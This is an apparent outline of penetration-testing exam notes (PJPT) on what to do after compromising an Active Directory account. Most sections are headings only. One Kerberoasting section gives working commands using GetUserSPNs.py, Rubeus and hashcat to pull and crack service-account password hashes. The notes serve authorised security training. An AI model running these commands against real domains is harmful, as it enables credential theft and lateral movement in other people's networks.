Post-Compromise Strategy
Overview
The Question: "We have an account, now what?"
Phase 1: Search the Quick Wins
1. Kerberoasting
# Using GetUserSPNs.py (Impacket)
GetUserSPNs.py domain.local/username:password -dc-ip dc_ip -request
# Using Rubeus (if you have a Windows session)
Rubeus.exe kerberoast /outfile:kerberoast_hashes.txt
# Crack the hashes
hashcat -m 13100 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt
# Expected outcomes:
# - Service account passwords
# - Potential admin-level accounts
# - Lateral movement opportunities2. Secretsdump
3. Pass the Hash / Pass the Password
Quick Win Assessment Checklist
Phase 2: No Quick Wins? Dig Deep!
1. Enumerate with Bloodhound
Key Bloodhound Queries for Post-Compromise
2. Analyze Account Access
Access Analysis Questions
3. Old Vulnerabilities Die Hard
Common Legacy Vulnerabilities to Check
Phase 3: Think Outside the Box
Creative Enumeration Techniques
1. LDAP Enumeration for Hidden Information
2. Credential Hunting in Unexpected Places
3. Living Off The Land Techniques
Strategic Decision Tree
When Quick Wins Succeed
When Deep Enumeration is Required
Post-Compromise Methodology Summary
Phase 1: Quick Assessment (15-30 minutes)
Phase 2: Deep Enumeration (1-2 hours)
Phase 3: Creative Approaches (Ongoing)
PJPT Exam Strategy
Time Management for Post-Compromise
Documentation Priority
Last updated